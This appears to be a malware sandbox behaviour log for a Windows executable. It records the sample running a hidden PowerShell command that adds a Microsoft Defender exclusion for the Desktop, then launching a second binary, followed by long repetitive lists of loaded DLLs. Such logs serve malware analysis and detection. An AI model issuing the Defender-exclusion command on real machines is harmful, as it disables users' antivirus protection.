Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exeJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Reka\rapnewsa.exeSection loaded: apphelp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winhttp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: dpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Reka\rapnewsa.exeSection loaded: uxtheme.dll
Source: C:\Reka\rapnewsa.exeSection loaded: webio.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mswsock.dll
Source: C:\Reka\rapnewsa.exeSection loaded: iphlpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winnsi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: sspicli.dll
Source: C:\Reka\rapnewsa.exeSection loaded: schannel.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mskeyprotect.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ntasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncrypt.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncryptsslp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: msasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptsp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: rsaenh.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptbase.dll
Source: C:\Reka\rapnewsa.exeSection loaded: gpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: windows.storage.dll
Source: C:\Reka\rapnewsa.exeSection loaded: wldp.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
